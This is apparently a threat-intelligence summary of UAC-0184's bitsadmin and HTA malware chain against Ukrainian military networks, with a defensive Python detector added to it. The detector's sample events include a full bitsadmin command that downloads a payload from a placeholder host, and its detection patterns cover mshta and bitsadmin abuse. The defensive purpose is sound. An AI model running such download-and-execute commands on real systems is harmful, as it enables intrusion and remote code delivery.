
UAC-0184 Malware Targets Ukrainian Military Networks Using Bitsadmin

Severity: High (Score: 72.6)

Sources: Cybersecuritynews, Gbhackers

Published: 2026-05-19 · Updated: 2026-05-20

Keywords: chain, uac-0184, bitsadmin, newly, documented, attack, linked

Summary

UAC-0184 has deployed a multi-stage malware chain that uses the Windows bitsadmin tool and HTA files to deliver obfuscated payloads. This campaign primarily targets Ukrainian military networks, specifically accounts linked to the Armed Forces of Ukraine. The malware hides behind signed binaries such as VSLauncher.exe and PassMark Endpoint to maintain stealth. CERT-UA has reported on this activity throughout 2024 and 2025, indicating a focused effort on military-related targets. The attack highlights the ongoing cyber threats faced by Ukraine amid geopolitical tensions. The full scope of the impact remains under investigation as security teams respond to the threat.

Key Points:

  • UAC-0184 uses bitsadmin and HTA files to deliver malware to Ukrainian military networks.
  • The campaign targets accounts associated with the Armed Forces of Ukraine.
  • The malware employs signed binaries for stealth, complicating detection efforts.

Detailed Analysis

**Impact**

The campaign targets Ukrainian military networks, specifically accounts linked to the Armed Forces of Ukraine. The operation affects military personnel and associated defense infrastructure within Ukraine. The scope includes stealthy network access, potentially compromising sensitive military data and operational capabilities. No specific numbers of affected systems or data volumes were provided.

**Technical Details**

The attack chain uses a multi-stage malware deployment involving Windows’ built-in bitsadmin tool and HTA loaders to deliver a heavily obfuscated payload bundle. The payload is concealed behind signed binaries such as VSLauncher.exe and PassMark Endpoint to evade detection. The campaign focuses on the initial access and persistence stages, leveraging legitimate tools for stealth. No CVEs or specific infrastructure details were disclosed. No IOCs were mentioned.

**Recommended Response**

Monitor and restrict the use of bitsadmin and HTA files within the network, especially on systems related to military operations. Implement behavioral detections for anomalous execution of signed binaries like VSLauncher.exe and PassMark Endpoint. Harden endpoint security controls to detect obfuscated payloads and enforce application whitelisting. No patching or specific indicators were provided; continuous monitoring of military network traffic and account activity is advised.
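As an added example that is not part of the original report or either source article, the following Python applies the monitoring advice above to constructed Sysmon-style process-creation records: it flags bitsadmin download jobs, mshta executing an .hta file, and a signed binary launched from a user-writable path by one of those parents. The event fields, process names and sample paths are assumptions for illustration.

```python
import re

# Constructed process-creation records in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 2210, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\invoice.hta", "signed": True},
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high "
                r"http://example.invalid/p.bin C:\Users\u\AppData\Local\Temp\p.bin",
     "signed": True},
    {"pid": 4201, "ppid": 4120, "image": r"C:\Users\u\AppData\Local\Temp\VSLauncher.exe",
     "cmdline": "VSLauncher.exe", "signed": True},
    {"pid": 5000, "ppid": 800, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "signed": True},
]

# Command-line patterns for the two LOLBin stages named in the report.
RULES = [
    ("T1197 bitsadmin download",
     re.compile(r"bitsadmin(\.exe)?\b.*\s/(transfer|download|addfile)\b", re.I)),
    ("T1218.005 mshta running .hta",
     re.compile(r"mshta(\.exe)?\b.*\.hta\b", re.I)),
]

# Parents whose children deserve extra scrutiny (HTA loader and BITS client).
SUSPICIOUS_PARENTS = {"mshta.exe", "bitsadmin.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (pid, finding) pairs for every record that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        for name, rx in RULES:
            if rx.search(e["cmdline"]):
                findings.append((e["pid"], name))
        parent = by_pid.get(e["ppid"])
        # A validly signed binary is not benign on its own: flag it when it runs from
        # AppData and was spawned by the HTA/BITS stage, matching the chain described.
        if (parent and basename(parent["image"]) in SUSPICIOUS_PARENTS
                and e["signed"] and "\\appdata\\" in e["image"].lower()):
            findings.append((e["pid"], "signed binary from AppData spawned by "
                             + basename(parent["image"])))
    return findings


if __name__ == "__main__":
    for pid, finding in evaluate(SAMPLE_EVENTS):
        print(pid, finding)
```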

Source articles (2)

  • UAC — Cybersecuritynews · 2026-05-19
    A newly documented attack chain linked to the threat group UAC-0184 has been observed using Windows’ built-in bitsadmin tool and HTA files to sneak malicious payloads onto targeted systems. The campai…
  • UAC — Gbhackers · 2026-05-19
    UAC-0184 uses a multi‑stage malware chain that abuses bitsadmin and HTA loaders to reach a heavily obfuscated payload bundle, ultimately hiding behind signed binaries such as VSLauncher.exe and PassMa…

Timeline

  • 2024-01-01 — CERT-UA begins reporting on UAC-0184 activity: CERT-UA documented the initial signs of UAC-0184 targeting military networks in Ukraine.
  • 2025-12-01 — Increased targeting of military accounts: Reports indicated a rise in attacks focused on accounts belonging to the Armed Forces of Ukraine.
  • 2026-05-19 — UAC-0184 malware chain documented: Cybersecurity analysts released findings on UAC-0184's use of bitsadmin and HTA files to infiltrate systems.

Related entities

  • Malware (Attack Type)
  • Ukraine (Country)
  • UAC-0184 (APT Group)
  • T1027 - Obfuscated Files or Information (MITRE ATT&CK)
  • T1059.005 - Visual Basic (MITRE ATT&CK)
  • T1105 - Ingress Tool Transfer (MITRE ATT&CK)
  • T1197 - BITS Jobs (MITRE ATT&CK)
  • T1218.005 - Mshta (MITRE ATT&CK)
  • T1218 - System Binary Proxy Execution (MITRE ATT&CK)
  • Windows (Platform)
  • Bitsadmin (Tool)